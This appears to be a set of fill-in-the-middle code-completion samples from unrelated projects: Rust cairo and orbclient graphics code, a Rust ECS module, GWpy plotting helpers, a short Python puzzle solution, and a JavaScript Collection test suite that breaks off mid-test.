//pub fn cairo_scaled_font_text_to_glyphs(scaled_font: *mut cairo_scaled_font_t, x: c_double, y: c_double, utf8: *mut char, utf8_len: c_int, glyphs: **mut Glyph, num_glyphs: *mut c_int, clusters: **mut TextCluster, num_clusters: *mut c_int, cluster_flags: *mut TextClusterFlags) -> Status;
//pub fn cairo_scaled_font_get_font_face(scaled_font: *mut cairo_scaled_font_t) -> *mut cairo_font_face_t;
//pub fn cairo_scaled_font_get_font_options(scaled_font: *mut cairo_scaled_font_t, options: *mut cairo_font_options_t);
//pub fn cairo_scaled_font_get_font_matrix(scaled_font: *mut cairo_scaled_font_t, font_matrix: *mut cairo_matrix_t);
//pub fn cairo_scaled_font_get_ctm(scaled_font: *mut cairo_scaled_font_t, ctm: *mut cairo_matrix_t);
//pub fn cairo_scaled_font_get_scale_matrix(scaled_font: *mut cairo_scaled_font_t, scale_matrix: *cairo_matrix_t);
pub fn reference(&self) -> ScaledFont {
unsafe {
ScaledFont(ffi::cairo_scaled_font_reference(self.get_ptr()))
}
}
}
impl Drop for ScaledFont {
fn drop(&mut self) {
unsafe {
ffi::cairo_scaled_font_destroy(self.get_ptr())
}
}
}<|fim▁end|>
|
impl Clone for FontOptions {
fn clone(&self) -> FontOptions {
|
<|file_name|>1379.py<|end_file_name|><|fim▁begin|>"""
The mean of three integers A, B and C is (A + B + C)/3. The median of three integers is the one that would be in the
middle if they are sorted in non-decreasing order. Given two integers A and B, return the minimum possible integer C
such that the mean and the median of A, B and C are equal.
Input
Each test case is given in a single line that contains two integers A and B (1 ≤ A ≤ B ≤ 109). The last test case is
followed by a line containing two zeros.
Output
For each test case output one line containing the minimum possible integer C such that the mean and the median of A, B
and C are equal.
"""
while True:<|fim▁hole|>
    A, B = map(int, input().split())
    if A == 0 and B == 0:
        break
    # Minimum C keeps A as the median: C = 2*A - B (see derivation above).
    print(2 * A - B)<|fim▁end|>
| |
<|file_name|>simple.rs<|end_file_name|><|fim▁begin|>// SPDX-License-Identifier: MIT
use orbclient::{Color, EventOption, GraphicsPath, Mode, Renderer, Window};
fn main() {
let (width, height) = orbclient::get_display_size().unwrap();
let mut window = Window::new(
(width as i32) / 4,
(height as i32) / 4,
width / 2,
height / 2,
"TITLE",
)
.unwrap();
let (win_w, win_h) = (width / 2, height / 2);
    // top left -> bottom right
window.linear_gradient(
0,
0,
win_w / 3,
win_h,
0,
0,
(win_w / 3) as i32,
(win_h / 2) as i32,
Color::rgb(128, 128, 128),
Color::rgb(255, 255, 255),
);
// horizontal gradient
window.linear_gradient(
(win_w / 3) as i32,
0,
win_w / 3,
win_h,
(win_w / 3) as i32,
0,
(2 * win_w / 3) as i32,
0,
Color::rgb(128, 255, 255),
Color::rgb(255, 255, 255),
);
// vertical gradient
window.linear_gradient(
(2 * win_w / 3) as i32,
0,
win_w / 3,
win_h,
(2 * win_w / 3) as i32,
0,
(2 * win_w / 3) as i32,
win_h as i32,
Color::rgb(0, 128, 0),
Color::rgb(255, 255, 255),
);
window.arc(100, 100, -25, 1 << 0 | 1 << 2, Color::rgb(0, 0, 255));
window.arc(100, 100, -25, 1 << 1 | 1 << 3, Color::rgb(0, 255, 255));
window.arc(100, 100, -25, 1 << 4 | 1 << 6, Color::rgb(255, 0, 255));
window.arc(100, 100, -25, 1 << 5 | 1 << 7, Color::rgb(255, 255, 0));
window.circle(100, 100, 25, Color::rgb(0, 0, 0));
window.circle(100, 101, -25, Color::rgb(0, 255, 0));
window.circle(220, 220, -100, Color::rgba(128, 128, 128, 80));
window.wu_circle(150, 220, 100, Color::rgba(255, 0, 0, 255));
window.line(0, 0, 200, 200, Color::rgb(255, 0, 0));
window.line(0, 200, 200, 0, Color::rgb(128, 255, 0));
// vertical and horizontal line test
window.line(100, 0, 100, 200, Color::rgb(0, 0, 255));
window.line(0, 100, 200, 100, Color::rgb(255, 255, 0));
window.wu_line(100, 220, 400, 250, Color::rgba(255, 0, 0, 255));
window.line(100, 230, 400, 260, Color::rgba(255, 0, 0, 255));
// path and bezier curve example draw a cloud
let mut cloud_path = GraphicsPath::new();
cloud_path.move_to(170, 80);
cloud_path.bezier_curve_to(130, 100, 130, 150, 230, 150);
cloud_path.bezier_curve_to(250, 180, 320, 180, 340, 150);
cloud_path.bezier_curve_to(420, 150, 420, 120, 390, 100);
cloud_path.bezier_curve_to(430, 40, 370, 30, 340, 50);
cloud_path.bezier_curve_to(320, 5, 250, 20, 250, 50);
cloud_path.bezier_curve_to(200, 5, 150, 20, 170, 80);
window.draw_path_stroke(cloud_path, Color::rgb(0, 0, 255));
// path and quadratic curve example draw a balloon
let mut balloon_path = GraphicsPath::new();
balloon_path.move_to(75, 25);
balloon_path.quadratic_curve_to(25, 25, 25, 62);
balloon_path.quadratic_curve_to(25, 100, 50, 100);
balloon_path.quadratic_curve_to(50, 120, 30, 125);
balloon_path.quadratic_curve_to(60, 120, 65, 100);
balloon_path.quadratic_curve_to(125, 100, 125, 62);
balloon_path.quadratic_curve_to(125, 25, 75, 25);
window.draw_path_stroke(balloon_path, Color::rgb(0, 0, 255));
window.char(200, 200, '═', Color::rgb(0, 0, 0));
window.char(208, 200, '═', Color::rgb(0, 0, 0));
// testing for non existent x,y position : does not panic but returns Color(0,0,0,0)
let _non_existent_pixel = window.getpixel(width as i32 + 10, height as i32 + 10);
// testing PartialEq for Color
if Color::rgb(11, 2, 3) == Color::rgba(1, 2, 3, 100) {
println!("Testing colors: they are the same!")
} else {
println!("Testing colors: they are NOT the same!")
}<|fim▁hole|>
//Draw a transparent rectangle over window content
// default mode is Blend
window.rect(250, 200, 80, 80, Color::rgba(100, 100, 100, 100));
//Draw an opaque rectangle replacing window content
window.mode().set(Mode::Overwrite); // set window drawing mode to Overwrite from now on
window.rect(300, 220, 80, 80, Color::rgb(100, 100, 100));
//Draw a hole in the window replacing alpha channel (Only in Orbital, not in SDL2)
window.rect(300, 100, 80, 80, Color::rgba(10, 10, 10, 1));
//Draw a transparent rectangle over window content
    window.mode().set(Mode::Blend); //set mode to Blend from now on
window.rect(200, 230, 80, 80, Color::rgba(100, 100, 100, 100));
//Draw a blured box over window content
window.box_blur(170, 100, 150, 150, 10);
//Draw a shadow around a box
window.box_shadow(170, 100, 150, 150, 0, 0, 20, Color::rgba(0, 0, 0, 255));
window.sync();
'events: loop {
for event in window.events() {
match event.to_option() {
EventOption::Quit(_quit_event) => break 'events,
EventOption::Mouse(evt) => println!(
"At position {:?} pixel color is : {:?}",
(evt.x, evt.y),
window.getpixel(evt.x, evt.y)
),
event_option => println!("{:?}", event_option),
}
}
}
}<|fim▁end|>
| |
<|file_name|>translate_armor_search.js<|end_file_name|><|fim▁begin|>var tag, tag_text;
var name, name_jp;
var matched; // declared here so the assignment below is not an implicit global
var labeltags = document.getElementsByTagName("label");
for (var i = 0; i < labeltags.length; i++) {
tag = labeltags[i];
tag_text = tag.innerText;
for (var j=0; j<skill_replace_list.length; j++) {
name = skill_replace_list[j]["name"];
name_jp = skill_replace_list[j]["name_jp"];
// replace on exact match only
if (tag_text == name_jp) {
tag.innerText = name;
tag.setAttribute("title", name_jp);
matched = true;
break;<|fim▁hole|><|fim▁end|>
|
}
}
}
|
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>mod builder;
pub mod update_queue;
pub use self::builder::StateBuilder;
pub use self::update_queue::Monitors as UpdateMonitors;
use ecs::entity::{Entities, Entity, EntityRef, Accessor};
use ecs::module::{Component, StorageReadGuard, StorageWriteGuard};
use ecs::module::{Module, Modules, HasComponent};
use ecs::spawn::{SpawnRequest, Prototype};
use ecs::group::Groups;
use self::update_queue::{UpdateQueues, UpdateQueue, UpdateQueueReader};
use rayon;
pub struct State<Cx: Send> {
entities: Entities,
modules: Modules<Cx>,
groups: Groups,
update_queues: UpdateQueues,
}
impl<Cx: Send> State<Cx> {
pub fn new(modules: Modules<Cx>,
groups: Groups,
update_queues: UpdateQueues)
-> Self {
State {
entities: Entities::new(),
modules: modules,
groups: groups,
update_queues: update_queues,
}
}
pub fn entity_ref<'a>(&self, accessor: Accessor<'a>) -> EntityRef {
self.entities.entity_ref(accessor)
}
pub fn accessor(&self, entity_ref: EntityRef) -> Option<Accessor> {
self.entities.upgrade(entity_ref)
}
fn spawn_later(&self) -> Entity {
let entity = self.entities.create();
self.entities.spawn_later(entity);
entity
}
fn attach_later<'a, C: Component>(&self, accessor: Accessor<'a>, component: C::Template) {
self.update_queue::<C>().attach(accessor, component);
}
fn detach_later<'a, C: Component>(&self, accessor: Accessor<'a>) {
self.update_queue::<C>().detach(accessor);
}
fn update_queue<C: Component>(&self) -> &UpdateQueue<C> {
self.update_queues
.get::<C>()
.expect("the component has not been registered")
}
fn remove_later<'a>(&self, entity: Accessor<'a>) {
self.entities.remove_later(entity);
}
pub fn read<C: Component>(&self) -> StorageReadGuard<<C::Module as HasComponent<C>>::Storage>
where C::Module: Module<Cx>
{
self.module::<C::Module>().read()
}
pub fn write<C: Component>(&self) -> StorageWriteGuard<<C::Module as HasComponent<C>>::Storage>
where C::Module: Module<Cx>
{
self.module::<C::Module>().write()
}
pub fn module<M: Module<Cx>>(&self) -> &M {
self.modules
.get::<M>()
.expect("the requested module doesn't exists")
}
<|fim▁hole|>
fn commit(&mut self, cx: &mut Cx) {
let world_removes = self.entities.push_removes();
let &mut State { ref mut update_queues,
ref mut groups,
ref mut entities,
ref mut modules,
.. } = self;
{
entities.commit();
let commit_args = CommitArgs {
entities: &*entities,
update_queues: update_queues,
world_removes: &world_removes,
};
modules.commit(&commit_args, cx);
}
groups.commit(&update_queues.monitors());
update_queues.clear_flags();
}
}
pub struct Update<'a, Cx: Send + 'a> {
state: &'a mut State<Cx>,
}
impl<'a, Cx: Send + 'a> Update<'a, Cx> {
pub fn commit<F>(&mut self, context: &mut Cx, f: F)
where F: FnOnce(&State<Cx>, Commit<Cx>, &mut Cx)
{
{
let state = &*self.state;
f(state, Commit { state: state }, context);
}
self.state.commit(context);
}
}
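// A minimal usage sketch (hypothetical context type and component; the
// `Accessor` would normally come from iterating a group):
//
//     state.update().commit(&mut cx, |_state, commit, _cx| {
//         commit.attach_later::<Position>(entity, position_template);
//         commit.remove_later(other_entity);
//     });
//
// All queued spawns, attaches, detaches and removes are applied when the
// closure returns and the internal commit runs.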
pub struct Commit<'a, Cx: Send + 'a> {
state: &'a State<Cx>,
}
impl<'a, Cx: Send + 'a> Commit<'a, Cx> {
#[inline]
pub fn spawn_later(self) -> SpawnRequest<'a, Cx> {
let entity = self.state.spawn_later();
SpawnRequest::new(entity, self)
}
#[inline]
pub fn spawn_later_with<P: Prototype>(self, prototype: P) {
let request = self.spawn_later();
prototype.spawn_later_with(request);
}
#[inline]
pub fn update_queue<C: Component>(self) -> &'a UpdateQueue<C> {
self.state.update_queue::<C>()
}
#[inline]
pub fn remove_later(self, entity: Accessor) {
self.state.remove_later(entity)
}
#[inline]
pub fn attach_later<C: Component>(self, entity: Accessor, component: C::Template) {
self.state.attach_later::<C>(entity, component);
}
#[inline]
pub fn detach_later<C: Component>(self, entity: Accessor) {
self.state.detach_later::<C>(entity);
}
}
impl<'a, Cx: Send + 'a> Clone for Commit<'a, Cx> {
#[inline]
fn clone(&self) -> Self {
Commit { state: self.state }
}
}
impl<'a, Cx: Send + 'a> Copy for Commit<'a, Cx> {}
pub struct CommitArgs<'a> {
pub entities: &'a Entities,
update_queues: &'a UpdateQueues,
world_removes: &'a [Entity],
}
impl<'a> CommitArgs<'a> {
pub fn update_reader_for<C: Component>(&self) -> UpdateQueueReader<C> {
self.update_queues
.get::<C>()
.expect("the component has not been registered")
.process(self.world_removes)
}
pub fn world_removes(&self) -> &[Entity] {
&self.world_removes
}
}<|fim▁end|>
|
pub fn update(&mut self) -> Update<Cx> {
Update { state: self }
}
|
<|file_name|>axes.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright (C) Duncan Macleod (2013)
#
# This file is part of GWpy.
#
# GWpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GWpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GWpy. If not, see <http://www.gnu.org/licenses/>.
"""Extension of the :class:`~matplotlib.axes.Axes` class with
user-friendly attributes
"""
from six import string_types
from matplotlib.axes import Axes as _Axes
from matplotlib.artist import Artist
from matplotlib.projections import register_projection
from .decorators import auto_refresh
from . import (rcParams, tex, html)
__author__ = 'Duncan Macleod <duncan.macleod@ligo.org>'
class Axes(_Axes):
"""An extension of the core matplotlib :class:`~matplotlib.axes.Axes`.
These custom `Axes` provide only some simpler attribute accessors.
Notes
-----
A new set of `Axes` should be constructed via::
<|fim▁hole|>
where plot is a :class:`~gwpy.plotter.Plot` figure, and ``'xxx'``
is the name of the `Axes` you want to add.
"""
projection = 'rectilinear'
def __init__(self, *args, **kwargs):
super(Axes, self).__init__(*args, **kwargs)
self.xaxis.labelpad = 10
__init__.__doc__ = _Axes.__init__.__doc__
# -----------------------------------------------
# text properties
# x-axis label
@property
def xlabel(self):
"""Label for the x-axis
:type: :class:`~matplotlib.text.Text`
"""
return self.xaxis.label
@xlabel.setter
@auto_refresh
def xlabel(self, text):
if isinstance(text, string_types):
self.set_xlabel(text)
else:
self.xaxis.label = text
@xlabel.deleter
@auto_refresh
def xlabel(self):
self.set_xlabel("")
# y-axis label
@property
def ylabel(self):
"""Label for the y-axis
:type: :class:`~matplotlib.text.Text`
"""
return self.yaxis.label
@ylabel.setter
@auto_refresh
def ylabel(self, text):
if isinstance(text, string_types):
self.set_ylabel(text)
else:
self.yaxis.label = text
@ylabel.deleter
@auto_refresh
def ylabel(self):
self.set_ylabel("")
# -----------------------------------------------
# limit properties
@property
def xlim(self):
"""Limits for the x-axis
:type: `tuple`
"""
return self.get_xlim()
@xlim.setter
@auto_refresh
def xlim(self, limits):
self.set_xlim(*limits)
@xlim.deleter
@auto_refresh
def xlim(self):
self.relim()
self.autoscale_view(scalex=True, scaley=False)
@property
def ylim(self):
"""Limits for the y-axis
:type: `tuple`
"""
return self.get_ylim()
@ylim.setter
@auto_refresh
def ylim(self, limits):
self.set_ylim(*limits)
@ylim.deleter
def ylim(self):
self.relim()
self.autoscale_view(scalex=False, scaley=True)
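    # A short usage sketch for the accessors above (``ax`` is an instance
    # of this class):
    #
    #   ax.xlabel = 'Time [s]'   # equivalent to ax.set_xlabel('Time [s]')
    #   ax.xlim = (0, 10)        # equivalent to ax.set_xlim(0, 10)
    #   del ax.ylim              # autoscale the y-axis again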
# -----------------------------------------------
# scale properties
@property
def logx(self):
"""Display the x-axis with a logarithmic scale
:type: `bool`
"""
return self.get_xscale() == "log"
@logx.setter
@auto_refresh
def logx(self, log):
if log and not self.logx:
self.set_xscale('log')
elif self.logx and not log:
self.set_xscale('linear')
@property
def logy(self):
"""Display the y-axis with a logarithmic scale
:type: `bool`
"""
return self.get_yscale() == "log"
@logy.setter
@auto_refresh
def logy(self, log):
if log and not self.logy:
self.set_yscale('log')
elif self.logy and not log:
self.set_yscale('linear')
# -------------------------------------------
# Axes methods
@auto_refresh
def resize(self, pos, which='both'):
"""Set the axes position with::
pos = [left, bottom, width, height]
in relative 0,1 coords, or *pos* can be a
:class:`~matplotlib.transforms.Bbox`
There are two position variables: one which is ultimately
used, but which may be modified by :meth:`apply_aspect`, and a
second which is the starting point for :meth:`apply_aspect`.
"""
return super(Axes, self).set_position(pos, which=which)
@auto_refresh
def add_label_unit(self, unit, axis='x'):
label = getattr(self, 'get_%slabel' % axis)()
if not label:
label = unit.__doc__
if rcParams.get("text.usetex", False):
unitstr = tex.unit_to_latex(unit)
else:
unitstr = unit.to_string()
set_ = getattr(self, 'set_%slabel' % axis)
if label:
set_("%s [%s]" % (label, unitstr))
else:
set_(unitstr)
def legend(self, *args, **kwargs):
# set kwargs
alpha = kwargs.pop("alpha", 0.8)
linewidth = kwargs.pop("linewidth", 8)
# make legend
legend = super(Axes, self).legend(*args, **kwargs)
# find relevant axes
if legend is not None:
lframe = legend.get_frame()
lframe.set_alpha(alpha)
[l.set_linewidth(linewidth) for l in legend.get_lines()]
return legend
legend.__doc__ = _Axes.legend.__doc__
def html_map(self, imagefile, data=None, **kwargs):
"""Create an HTML map for some data contained in these `Axes`
Parameters
----------
        imagefile : `str`
            path to image file on disk for the containing `Figure`
        data : `~matplotlib.artist.Artist`, `~gwpy.types.Series`, `array-like`, optional
            data to map, either an `Artist` already drawn on these axes
            (via :meth:`plot` or :meth:`scatter`, for example) or a data set
mapname : `str`, optional
ID to connect <img> tag and <map> tags, default: ``'points'``. This
should be unique if multiple maps are to be written to a single
HTML file.
shape : `str`, optional
shape for <area> tag, default: ``'circle'``
standalone : `bool`, optional
wrap map HTML with required HTML5 header and footer tags,
default: `True`
title : `str`, optional
title name for standalone HTML page
jquery : `str`, optional
URL of jquery script, defaults to googleapis.com URL
Returns
-------
HTML : `str`
string of HTML markup that defines the <img> and <map>
"""
if data is None:
artists = self.lines + self.collections + self.images
if len(artists) != 1:
raise ValueError("Cannot determine artist to map, %d found."
% len(artists))
data = artists[0]
if isinstance(data, Artist):
return html.map_artist(data, imagefile, **kwargs)
else:
return html.map_data(data, self, imagefile, **kwargs)
register_projection(Axes)<|fim▁end|>
|
>>> plot.add_subplots(111, projection='xxx')
|
<|file_name|>Collection.spec.js<|end_file_name|><|fim▁begin|>import expect from "expect";
import { Collection } from "./Collection";
import { Server } from "./Server";
describe("Collection", () => {
describe("constructor", () => {
it("should set the initial set of data", () => {
const collection = new Collection([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
expect(collection.getAll()).toEqual([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
});
it("should set identifier name to id by default", () => {
const collection = new Collection();
expect(collection.identifierName).toEqual("id");
});
});
describe("getCount", () => {
it("should return an integer", () => {
expect(new Collection().getCount()).toEqual(0);
});
it("should return the collection size", () => {
expect(new Collection([{}, {}]).getCount()).toEqual(2);
});
it("should return the correct collection size, even when items were removed", () => {
const collection = new Collection([{}, {}, {}]);
collection.removeOne(1);
expect(collection.getCount()).toEqual(2);<|fim▁hole|> function filter(item) {
return item.name == "a" || item.name == "b";
}
expect(collection.getCount({ filter: filter })).toEqual(2);
});
});
describe("getAll", () => {
it("should return an array", () => {
expect(new Collection().getAll()).toEqual([]);
});
it("should return all collections", () => {
const collection = new Collection([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
expect(collection.getAll()).toEqual([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
});
describe("sort query", () => {
it("should throw an error if passed an unsupported sort argument", () => {
const collection = new Collection();
expect(() => {
collection.getAll({ sort: 23 });
}).toThrow(new Error("Unsupported sort type"));
});
it("should sort by sort function", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
const expected = [
{ name: "a", id: 1 },
{ name: "b", id: 2 },
{ name: "c", id: 0 },
];
function sort(a, b) {
if (a.name > b.name) {
return 1;
}
if (a.name < b.name) {
return -1;
}
// a must be equal to b
return 0;
}
expect(collection.getAll({ sort: sort })).toEqual(expected);
});
it("should sort by sort name", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
const expected = [
{ name: "a", id: 1 },
{ name: "b", id: 2 },
{ name: "c", id: 0 },
];
expect(collection.getAll({ sort: "name" })).toEqual(expected);
});
it("should sort by sort name and direction", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
let expected;
expected = [
{ name: "a", id: 1 },
{ name: "b", id: 2 },
{ name: "c", id: 0 },
];
expect(collection.getAll({ sort: ["name", "asc"] })).toEqual(expected);
expected = [
{ name: "c", id: 0 },
{ name: "b", id: 2 },
{ name: "a", id: 1 },
];
expect(collection.getAll({ sort: ["name", "desc"] })).toEqual(expected);
});
it("should not affect further requests", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
collection.getAll({ sort: "name" });
const expected = [
{ name: "c", id: 0 },
{ name: "a", id: 1 },
{ name: "b", id: 2 },
];
expect(collection.getAll()).toEqual(expected);
});
});
describe("filter query", () => {
it("should throw an error if passed an unsupported filter argument", () => {
const collection = new Collection();
expect(() => {
collection.getAll({ filter: 23 });
}).toThrow(new Error("Unsupported filter type"));
});
it("should filter by filter function", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
const expected = [
{ name: "c", id: 0 },
{ name: "b", id: 2 },
];
function filter(item) {
return item.name !== "a";
}
expect(collection.getAll({ filter: filter })).toEqual(expected);
});
it("should filter by filter object", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
const expected = [{ name: "b", id: 2 }];
expect(collection.getAll({ filter: { name: "b" } })).toEqual(expected);
});
it("should filter values with deep paths", () => {
const collection = new Collection([
{ name: "c", deep: { value: "c" } },
{ name: "a", deep: { value: "a" } },
{ name: "b", deep: { value: "b" } },
]);
const expected = [{ name: "b", deep: { value: "b" }, id: 2 }];
expect(collection.getAll({ filter: { "deep.value": "b" } })).toEqual(expected);
});
it("should filter values with objects", () => {
const collection = new Collection([
{ name: "c", deep: { value: "c" } },
{ name: "a", deep: { value: "a" } },
{ name: "b", deep: { value: "b" } },
]);
const expected = [{ name: "b", deep: { value: "b" }, id: 2 }];
expect(collection.getAll({ filter: { deep: { value: "b" } } })).toEqual(expected);
});
it("should filter boolean values properly", () => {
const collection = new Collection([
{ name: "a", is: true },
{ name: "b", is: false },
{ name: "c", is: true },
]);
const expectedFalse = [{ name: "b", id: 1, is: false }];
const expectedTrue = [
{ name: "a", id: 0, is: true },
{ name: "c", id: 2, is: true },
];
expect(collection.getAll({ filter: { is: "false" } })).toEqual(
expectedFalse
);
expect(collection.getAll({ filter: { is: false } })).toEqual(
expectedFalse
);
expect(collection.getAll({ filter: { is: "true" } })).toEqual(
expectedTrue
);
expect(collection.getAll({ filter: { is: true } })).toEqual(
expectedTrue
);
});
it("should filter array values properly", () => {
const collection = new Collection([
{ tags: ["a", "b", "c"] },
{ tags: ["b", "c", "d"] },
{ tags: ["c", "d", "e"] },
]);
const expected = [
{ id: 0, tags: ["a", "b", "c"] },
{ id: 1, tags: ["b", "c", "d"] },
];
expect(collection.getAll({ filter: { tags: "b" } })).toEqual(expected);
expect(collection.getAll({ filter: { tags: "f" } })).toEqual([]);
});
it("should filter array values properly within deep paths", () => {
const collection = new Collection([
{ deep: { tags: ["a", "b", "c"] } },
{ deep: { tags: ["b", "c", "d"] } },
{ deep: { tags: ["c", "d", "e"] } },
]);
const expected = [
{ id: 0, deep: { tags: ["a", "b", "c"] } },
{ id: 1, deep: { tags: ["b", "c", "d"] } },
];
expect(collection.getAll({ filter: { 'deep.tags': "b" } })).toEqual(expected);
expect(collection.getAll({ filter: { 'deep.tags': "f" } })).toEqual([]);
});
it("should filter array values properly inside deep paths", () => {
const collection = new Collection([
{ tags: { deep: ["a", "b", "c"] } },
{ tags: { deep: ["b", "c", "d"] } },
{ tags: { deep: ["c", "d", "e"] } },
]);
const expected = [
{ id: 0, tags: { deep: ["a", "b", "c"] } },
{ id: 1, tags: { deep: ["b", "c", "d"] } },
];
expect(collection.getAll({ filter: { 'tags.deep': "b" } })).toEqual(expected);
expect(collection.getAll({ filter: { 'tags.deep': "f" } })).toEqual([]);
});
it("should filter array values properly with deep paths", () => {
const collection = new Collection([
{ tags: [{ name: "a" }, { name: "b" }, { name: "c" }] },
{ tags: [{ name: "b" }, { name: "c" }, { name: "d" }] },
{ tags: [{ name: "c" }, { name: "d" }, { name: "e" }] },
]);
const expected = [
{ id: 0, tags: [{ name: "a" }, { name: "b" }, { name: "c" }] },
{ id: 1, tags: [{ name: "b" }, { name: "c" }, { name: "d" }] },
];
expect(collection.getAll({ filter: { 'tags.name': "b" } })).toEqual(expected);
expect(collection.getAll({ filter: { 'tags.name': "f" } })).toEqual([]);
});
it("should filter array values properly when receiving several values within deep paths", () => {
const collection = new Collection([
{ deep: { tags: ["a", "b", "c"] } },
{ deep: { tags: ["b", "c", "d"] } },
{ deep: { tags: ["c", "d", "e"] } },
]);
const expected = [{ id: 1, deep: { tags: ["b", "c", "d"] } }];
expect(collection.getAll({ filter: { 'deep.tags': ["b", "d"] } })).toEqual(
expected
);
expect(
collection.getAll({ filter: { 'deep.tags': ["a", "b", "e"] } })
).toEqual([]);
});
it("should filter array values properly when receiving several values with deep paths", () => {
const collection = new Collection([
{ tags: [{ name: "a" }, { name: "b" }, { name: "c" }] },
{ tags: [{ name: "c" }, { name: "d" }, { name: "e" }] },
{ tags: [{ name: "e" }, { name: "f" }, { name: "g" }] },
]);
const expected = [
{ id: 0, tags: [{ name: "a" }, { name: "b" }, { name: "c" }] },
{ id: 1, tags: [{ name: "c" }, { name: "d" }, { name: "e" }] }
];
expect(collection.getAll({ filter: { 'tags.name': ["c"] } })).toEqual(
expected
);
expect(
collection.getAll({ filter: { 'tags.name': ["h", "i"] } })
).toEqual([]);
});
it("should filter array values properly when receiving several values", () => {
const collection = new Collection([
{ tags: ["a", "b", "c"] },
{ tags: ["b", "c", "d"] },
{ tags: ["c", "d", "e"] },
]);
const expected = [{ id: 1, tags: ["b", "c", "d"] }];
expect(collection.getAll({ filter: { tags: ["b", "d"] } })).toEqual(
expected
);
expect(
collection.getAll({ filter: { tags: ["a", "b", "e"] } })
).toEqual([]);
});
it("should filter by the special q full-text filter", () => {
const collection = new Collection([
{ a: "Hello", b: "world" },
{ a: "helloworld", b: "bunny" },
{ a: "foo", b: "bar" },
{ a: { b: "bar" } },
{ a: "", b: "" },
{ a: null, b: null },
{},
]);
expect(collection.getAll({ filter: { q: "hello" } })).toEqual([
{ id: 0, a: "Hello", b: "world" },
{ id: 1, a: "helloworld", b: "bunny" },
]);
expect(collection.getAll({ filter: { q: "bar" } })).toEqual([
{ id: 2, a: "foo", b: "bar" },
{ id: 3, a: { b: "bar" } },
]);
});
it("should filter by range using _gte, _gt, _lte, and _lt", () => {
const collection = new Collection([{ v: 1 }, { v: 2 }, { v: 3 }]);
expect(collection.getAll({ filter: { v_gte: 2 } })).toEqual([
{ v: 2, id: 1 },
{ v: 3, id: 2 },
]);
expect(collection.getAll({ filter: { v_gt: 2 } })).toEqual([
{ v: 3, id: 2 },
]);
expect(collection.getAll({ filter: { v_gte: 4 } })).toEqual([]);
expect(collection.getAll({ filter: { v_lte: 2 } })).toEqual([
{ v: 1, id: 0 },
{ v: 2, id: 1 },
]);
expect(collection.getAll({ filter: { v_lt: 2 } })).toEqual([
{ v: 1, id: 0 },
]);
expect(collection.getAll({ filter: { v_lte: 0 } })).toEqual([]);
});
it("should filter by inequality using _neq", () => {
const collection = new Collection([{ v: 1 }, { v: 2 }, { v: 3 }]);
expect(collection.getAll({ filter: { v_neq: 2 } })).toEqual([
{ v: 1, id: 0 },
{ v: 3, id: 2 },
]);
});
it("should filter by text search using _q", () => {
const collection = new Collection([{ v: 'abCd' }, { v: 'cDef' }, { v: 'EFgh' }]);
expect(collection.getAll({ filter: { v_q: 'cd' } })).toEqual([
{ id: 0, v: 'abCd' }, { id: 1, v: 'cDef' }
]);
expect(collection.getAll({ filter: { v_q: 'ef' } })).toEqual([
{ id: 1, v: 'cDef' }, { id: 2, v: 'EFgh' }
]);
});
it("should filter by array", () => {
const collection = new Collection([
{ a: "H" },
{ a: "e" },
{ a: "l" },
{ a: "l" },
{ a: "o" },
]);
expect(collection.getAll({ filter: { id: [] } })).toEqual([]);
expect(collection.getAll({ filter: { id: [1, 2, 3] } })).toEqual([
{ id: 1, a: "e" },
{ id: 2, a: "l" },
{ id: 3, a: "l" },
]);
expect(collection.getAll({ filter: { id: ["1", "2", "3"] } })).toEqual([
{ id: 1, a: "e" },
{ id: 2, a: "l" },
{ id: 3, a: "l" },
]);
});
it("should combine all filters with an AND logic", () => {
const collection = new Collection([{ v: 1 }, { v: 2 }, { v: 3 }]);
expect(collection.getAll({ filter: { v_gte: 2, v_lte: 2 } })).toEqual([
{ v: 2, id: 1 },
]);
});
it("should not affect further requests", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
function filter(item) {
return item.name !== "a";
}
collection.getAll({ filter: filter });
const expected = [
{ name: "c", id: 0 },
{ name: "a", id: 1 },
{ name: "b", id: 2 },
];
expect(collection.getAll()).toEqual(expected);
});
});
describe("range query", () => {
it("should throw an error if passed an unsupported range argument", () => {
const collection = new Collection();
expect(() => {
collection.getAll({ range: 23 });
}).toThrow(new Error("Unsupported range type"));
});
const collection = new Collection([
{ id: 0, name: "a" },
{ id: 1, name: "b" },
{ id: 2, name: "c" },
{ id: 3, name: "d" },
{ id: 4, name: "e" },
]);
it("should return a range in the collection", () => {
let expected;
expected = [{ id: 0, name: "a" }];
expect(collection.getAll({ range: [0, 0] })).toEqual(expected);
expected = [
{ id: 1, name: "b" },
{ id: 2, name: "c" },
{ id: 3, name: "d" },
{ id: 4, name: "e" },
];
expect(collection.getAll({ range: [1] })).toEqual(expected);
expected = [
{ id: 2, name: "c" },
{ id: 3, name: "d" },
];
expect(collection.getAll({ range: [2, 3] })).toEqual(expected);
});
it("should not affect further requests", () => {
const collection = new Collection([
{ id: 0, name: "a" },
{ id: 1, name: "b" },
{ id: 2, name: "c" },
]);
collection.getAll({ range: [1] });
const expected = [
{ id: 0, name: "a" },
{ id: 1, name: "b" },
{ id: 2, name: "c" },
];
expect(collection.getAll()).toEqual(expected);
});
});
describe("embed query", () => {
it("should throw an error when trying to embed a non-existing collection", () => {
